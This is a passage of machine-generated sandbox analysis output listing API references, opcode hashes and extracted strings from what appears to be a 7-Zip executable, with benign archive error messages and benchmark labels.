                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ByteString
                              • String ID:
                              • API String ID: 4236320881-0
                              • Opcode ID: 2c2e37631b715157dc41e9a515c137241c6488906a9e2a13e0927854e2735fe0
                              • Instruction ID: dbb3e65845955f571d600f80adf98c9276045d36f60f46bb1f0da40c2ba6c063
                              • Opcode Fuzzy Hash: 2c2e37631b715157dc41e9a515c137241c6488906a9e2a13e0927854e2735fe0
                              • Instruction Fuzzy Hash: EE11705371C781C1E3209B19AC40B6A6A64E7897A4F448221EF9A477D4EB3CCD85A715
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: FileTime
                              • String ID:
                              • API String ID: 1425588814-0
                              • Opcode ID: 4a3de73dfb10b1671eec32927cac63c902511c3d15486891ba1e2983bc9e8865
                              • Instruction ID: 98a05e258160385a0655a0f7c3eef2124ceb520d21ac3d9732fbf6a356d239be
                              • Opcode Fuzzy Hash: 4a3de73dfb10b1671eec32927cac63c902511c3d15486891ba1e2983bc9e8865
                              • Instruction Fuzzy Hash: 98014E66B082C047E711DB35A90079EFB91B788BE8F14C122EE4C87B55D77CC445CB01
                              APIs
                                • Part of subcall function 00F796F8: SetFilePointer.KERNELBASE(00000003,00000000,00000000,?,00F79BD5), ref: 00F79736
                                • Part of subcall function 00F796F8: GetLastError.KERNEL32 ref: 00F79743
                                • Part of subcall function 00F796F8: SetLastError.KERNEL32 ref: 00F7975C
                              • SetEndOfFile.KERNELBASE ref: 00F799FB
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ErrorFileLast$Pointer
                              • String ID:
                              • API String ID: 1697706070-0
                              • Opcode ID: 7bc861c7b5eb5761a791ea73e4469635d3466af59617cd57f8b57b75ddb733e8
                              • Instruction ID: 949d4ebd0e5b6edd90419a6289260802540c5ae526ee5fb0aaaef0da710d5cf3
                              • Opcode Fuzzy Hash: 7bc861c7b5eb5761a791ea73e4469635d3466af59617cd57f8b57b75ddb733e8
                              • Instruction Fuzzy Hash: 44E026137044E493F7208BAA6881BA9C322AB447E0F94C132AF4D439049EE98CCAA700
                              APIs
                                • Part of subcall function 00F76B80: FreeLibrary.KERNELBASE(?,?,?,00F76C03), ref: 00F76B91
                              • LoadLibraryExW.KERNELBASE ref: 00F76C10
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: Library$FreeLoad
                              • String ID:
                              • API String ID: 534179979-0
                              • Opcode ID: ec535dba14579e588a217dbf5588d92892c876ee5900133f57a0fc40d7a99ceb
                              • Instruction ID: 8ad8a3b7454b5722e1cd039e93248e31835b99a701a4bc7a7eead7f8c1095f5b
                              • Opcode Fuzzy Hash: ec535dba14579e588a217dbf5588d92892c876ee5900133f57a0fc40d7a99ceb
                              • Instruction Fuzzy Hash: BED02E12701A1192EB252BA2399236823069B06BE2E08C032CF8D83B00DE280CFBB310
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: FileWrite
                              • String ID:
                              • API String ID: 3934441357-0
                              • Opcode ID: 2fb2f0fefd54e514cf6a40f39018a395235dd717ad2226923adce02d3f6e3b0a
                              • Instruction ID: fb4a85bb3e25c3e954d658eb851ee25ba6ff9e53a4622f4e9aec37aeeab88ff4
                              • Opcode Fuzzy Hash: 2fb2f0fefd54e514cf6a40f39018a395235dd717ad2226923adce02d3f6e3b0a
                              • Instruction Fuzzy Hash: 03E08C76314640CBE7508F60E400B5AB3A0F388B14F004025DE8E83B44DBBCC144CF40
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CloseFind
                              • String ID:
                              • API String ID: 1863332320-0
                              • Opcode ID: 83abdbc612d9fe913b19c0aa44b7f33faef9c6a21742b24dbd4aaeadee3cbc7c
                              • Instruction ID: 0d0ba32ca3e3aa96a5b36260c734abcc66f602539b4ffaa4403a19e65ab69a54
                              • Opcode Fuzzy Hash: 83abdbc612d9fe913b19c0aa44b7f33faef9c6a21742b24dbd4aaeadee3cbc7c
                              • Instruction Fuzzy Hash: A3D0A772E0190581DF311F7E984432C2352A754F74F188311CD744A2D0EF2488879301
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              • Opcode ID: 1a8169abdd710320b32848016f575c4d8c650cd2f5e1767a783909a1319054dd
                              • Instruction ID: 8d6920956edb119c49a069080fb3797eed14e7d77458dda359ff1ac18e78e973
                              • Opcode Fuzzy Hash: 1a8169abdd710320b32848016f575c4d8c650cd2f5e1767a783909a1319054dd
                              • Instruction Fuzzy Hash: 93D0177A614684CAE7008F60E04575AF764F388B68F080005EA9806764CBBCC199CB00
                              APIs
                              • FreeLibrary.KERNELBASE(?,?,?,00F76C03), ref: 00F76B91
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: FreeLibrary
                              • String ID:
                              • API String ID: 3664257935-0
                              • Opcode ID: 01109f61893c3e25e66fa0dd82789664d5e42eb5731ee3caf0e7fb23f98e379a
                              • Instruction ID: 569e920c1d0dd4033df495a391d492706d8b676f1108d34ba03fa5c9dc6abc10
                              • Opcode Fuzzy Hash: 01109f61893c3e25e66fa0dd82789664d5e42eb5731ee3caf0e7fb23f98e379a
                              • Instruction Fuzzy Hash: F6D012A2B12A0481FF254FA6A850B3523549F99F54F1C5015CD1DCA240EF298895E711
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs
                              • String ID:
                              • API String ID: 1795875747-0
                              • Opcode ID: f25a7451e5a52859bd194d4f45b432362e3ceccafce0c0a7c876b32af1063925
                              • Instruction ID: c64b66d51faba55136fe7af73aa8c72282ed6f29123beab069afbf45446cc71f
                              • Opcode Fuzzy Hash: f25a7451e5a52859bd194d4f45b432362e3ceccafce0c0a7c876b32af1063925
                              • Instruction Fuzzy Hash: 6AD0C79571074982DE10971AE4453696321F798FD4F4481229D5D47714ED2CD5599B01
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: FileTime
                              • String ID:
                              • API String ID: 1425588814-0
                              • Opcode ID: 5e4364cb886039da5450fc3fd998d3b1d61beb249d97927aa7d82ce99975c606
                              • Instruction ID: fb0e2e8efa5438a4360a933bcc13c9adbcb65a04b3096626370f688dfa7c6daa
                              • Opcode Fuzzy Hash: 5e4364cb886039da5450fc3fd998d3b1d61beb249d97927aa7d82ce99975c606
                              • Instruction Fuzzy Hash: A8B09220B12401C2CB0C6722989A32C13617B88B05FE1842AC50BD5A50CD1C84A96700
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 9553adbc2b0cf8556eb9aec2fa57ade0ad41d00013f749b76379d9959dd4e0d3
                              • Instruction ID: 70f49c585a8fe6f814aaa69c69ccf52979a5b37880224fa8e088880f8ff4deb6
                              • Opcode Fuzzy Hash: 9553adbc2b0cf8556eb9aec2fa57ade0ad41d00013f749b76379d9959dd4e0d3
                              • Instruction Fuzzy Hash: F121483370425096EF24DE6ABC0065A7250F385BF8F205229FE5A87388DB3DC842EB80
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8cc16c8876d987e3de5e17d18832af4d5879e21422368b64978be7a397600a75
                              • Instruction ID: a72bb118b17faf5b59936753717e17d6a19b563465e15d5099cd8bd7bbecbe31
                              • Opcode Fuzzy Hash: 8cc16c8876d987e3de5e17d18832af4d5879e21422368b64978be7a397600a75
                              • Instruction Fuzzy Hash: 30113A62B15654C1DF358B1C9580734AB91BFDC7E9F24C097EE4F8A610D729C855F203
                              APIs
                                • Part of subcall function 00F9CA94: free.MSVCRT ref: 00F9CAB1
                                • Part of subcall function 00F9CA94: free.MSVCRT ref: 00F9CABD
                                • Part of subcall function 00F9CA94: free.MSVCRT ref: 00F9CAC9
                                • Part of subcall function 00F9CA94: free.MSVCRT ref: 00F9CAD5
                                • Part of subcall function 00F9CA94: free.MSVCRT ref: 00F9CADE
                                • Part of subcall function 00F9CA94: free.MSVCRT ref: 00F9CAE7
                                • Part of subcall function 00F9CA94: free.MSVCRT ref: 00F9CAF0
                              • free.MSVCRT ref: 00FB2C15
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: d59108536d439d66a8f989801e68f7ac1a10c55ddb19c153846ac4e653761e0c
                              • Instruction ID: 60aa7541c2d6447f270b2194b37a195b166afa6c5c0122f02f01fac2bf9bc19e
                              • Opcode Fuzzy Hash: d59108536d439d66a8f989801e68f7ac1a10c55ddb19c153846ac4e653761e0c
                              • Instruction Fuzzy Hash: D0014C73A10794CACB219F1DC1811ADBB24F758FE83289116DB0907760EB36C883C7A1
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 3060b14f209173f6a28d50149139effb67babbacf6fb131f3e42512a25668859
                              • Instruction ID: 281b895c2957f130e776a4d7d5937005a6e1e1d49159d2bdd7ca8eaf78a9b353
                              • Opcode Fuzzy Hash: 3060b14f209173f6a28d50149139effb67babbacf6fb131f3e42512a25668859
                              • Instruction Fuzzy Hash: 1A018F7B3522408AE710CF24D56C35E3BB0A3D2BB8F540209DBA81B3D1C7BAC50ACB91
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: 22fbc2d5e8199965c03e49c0b63e129300cee38c0b71475972f44996e2a71a3b
                              • Instruction ID: 88e42ffa8395bb2825f2630b631934133053781531bc5e0bbc30b2d7c524a91f
                              • Opcode Fuzzy Hash: 22fbc2d5e8199965c03e49c0b63e129300cee38c0b71475972f44996e2a71a3b
                              • Instruction Fuzzy Hash: 5CF0EC6274004547DB009F7D98C03A82172B71C795F909437FF8F87A11D538CCA9E716
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: e16f68061b023a25359a80f0361e89c5542a2000306fd966a0e35091ec32aca1
                              • Instruction ID: f9701ccd83049c6b2bd2e693e9f2bd6087787a2bdc27470beb5eeb6b8bfb056b
                              • Opcode Fuzzy Hash: e16f68061b023a25359a80f0361e89c5542a2000306fd966a0e35091ec32aca1
                              • Instruction Fuzzy Hash: 50F037729292808E87A0DF28E44014ABBB0E2DA7A0B145226B7EDC7A99E63CC540CF10
                              APIs
                                • Part of subcall function 00F7960C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,00000000,?,?,00000000,?,00000003,00000003), ref: 00F7961E
                              • GetLastError.KERNEL32 ref: 00F7EEF9
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CloseErrorHandleLast
                              • String ID:
                              • API String ID: 918212764-0
                              • Opcode ID: 00fa4f0c7f1adc1a366ac466b20b99f97a8cee801e5bb11324bbd4013cf968dc
                              • Instruction ID: ef22ed2938b0141942d55dc32ce125d231e491bca8f41dcfe2623e9d76d5b9ba
                              • Opcode Fuzzy Hash: 00fa4f0c7f1adc1a366ac466b20b99f97a8cee801e5bb11324bbd4013cf968dc
                              • Instruction Fuzzy Hash: C2D05E81B601454BEF216ABD2CD43B401827B1C351F90947BFD9FC6612E96CCCCAB627
                              APIs
                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,00000000,?,?,00000000,?,00000003,00000003), ref: 00F7961E
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CloseHandle
                              • String ID:
                              • API String ID: 2962429428-0
                              • Opcode ID: 0d6a5ec00fd9bb15d2acceb7396023bc6caf58f05aff0577609e7a7fb7900fb0
                              • Instruction ID: 8153ca765f467721b7515fb4a980304a36a1909ad347cc121071c90c8da09693
                              • Opcode Fuzzy Hash: 0d6a5ec00fd9bb15d2acceb7396023bc6caf58f05aff0577609e7a7fb7900fb0
                              • Instruction Fuzzy Hash: E0D0C9B2E0194581DB316FBA98413282362AB54B74F689326CA784A6D0DF2985A6A712
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 3e155f00f62f0e47eb70742027f4ab7a19f307af7c84af4b08fedca37786f67f
                              • Instruction ID: 2afd145cdc1f12de6c7ae23a6845c1f81edb94c593a751ac965ef270415c7796
                              • Opcode Fuzzy Hash: 3e155f00f62f0e47eb70742027f4ab7a19f307af7c84af4b08fedca37786f67f
                              • Instruction Fuzzy Hash: 2FC012A1A5024583CEB4B7BA58410142261871D7347285762A92C492D2D51D89E7DA12
                              APIs
                                • Part of subcall function 00FC7CC0: free.MSVCRT ref: 00FC7CE5
                                • Part of subcall function 00FC7CC0: free.MSVCRT ref: 00FC7CEE
                                • Part of subcall function 00FC7CC0: free.MSVCRT ref: 00FC7D21
                                • Part of subcall function 00FC7CC0: free.MSVCRT ref: 00FC7D2E
                                • Part of subcall function 00FC7CC0: free.MSVCRT ref: 00FC7D5A
                                • Part of subcall function 00FC7CC0: free.MSVCRT ref: 00FC7D62
                                • Part of subcall function 00FC7CC0: free.MSVCRT ref: 00FC7D6A
                                • Part of subcall function 00FC7CC0: free.MSVCRT ref: 00FC7D77
                                • Part of subcall function 00FC7CC0: free.MSVCRT ref: 00FC7D80
                              • free.MSVCRT ref: 00FC7E5A
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: e32e438a77474687ca9c586bf6d33288871a840c7a8afb180b9d7493ede7d58d
                              • Instruction ID: 7b279a840376b47ca5d5f9720306061cbc3ee9b6e063c68e6480c4b5035da201
                              • Opcode Fuzzy Hash: e32e438a77474687ca9c586bf6d33288871a840c7a8afb180b9d7493ede7d58d
                              • Instruction Fuzzy Hash: 61C01262A10347438F68B6B95C42555325097187747340A14A9304D392D71DC9D35A50
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID: .001$7-Zip cannot find MAPISendMail function$7zE$GetFullPathName error$It is not allowed to include archive to itself$MAPISendMail$MAPISendMailW$Mapi32.dll$SFX file is not specified$Scanning error$The file already exists$The file is read-only$There is a folder with the name of archive$There is some data block after the end of the archive$Updating for multivolume archives is not implemented$can't find archive$cannot delete the file$cannot find specified SFX module$cannot load Mapi32.dll$cannot move the file$rsfx$stdout$type of archive is not specified
                              • API String ID: 0-3766773286
                              • Opcode ID: 20a7713ef6b6ea6d55c476e9192f369e3571137d13d581bad3dfa489e5dec892
                              • Instruction ID: 594eaeab982169c39d17396bc09607abef6407e4f17d575d4eef882ffbbc7512
                              • Opcode Fuzzy Hash: 20a7713ef6b6ea6d55c476e9192f369e3571137d13d581bad3dfa489e5dec892
                              • Instruction Fuzzy Hash: 89435332649AC591CBB0EB26E8913EEB360F7C5780F808113DA8E57B15DE7DC856EB11
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ClearCurrentFreeProcessVariantVirtualmemmove
                              • String ID: $ $ $ | $ (Cmplx)$1T CPU Freq (MHz):$@$AES128$AES192$Avg:$Avr:$Benchmark threads: $CPU$CPU hardware threads:$CRC$Compressing$Decompressing$Dict$Dictionary reduced to: $E/U$Effec$KiB/s$LZMA$MB/s$MIPS$Method$R/U$Rating$Size$Speed$T CPU Freq (MHz):$THRD$Tot:$Usage$crc32$file$file size =$freq$freq=$hash$mts$size: $tic$time$timems$usage:
                              • API String ID: 362377386-3040484101
                              • Opcode ID: 07e36092ce60e61bb6fe2e040f326c49f63224b88f446fd451f27cbac585813f
                              • Instruction ID: 1ecd471a3962e28e398db64240fbf37695333367ff9e062cbe1df27ad31da7c0
                              • Opcode Fuzzy Hash: 07e36092ce60e61bb6fe2e040f326c49f63224b88f446fd451f27cbac585813f
                              • Instruction Fuzzy Hash: 6A439F32609AC186DB70EB25E8947EEB361F7C5B90F808126DA8E57B19DF3CC545EB01
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
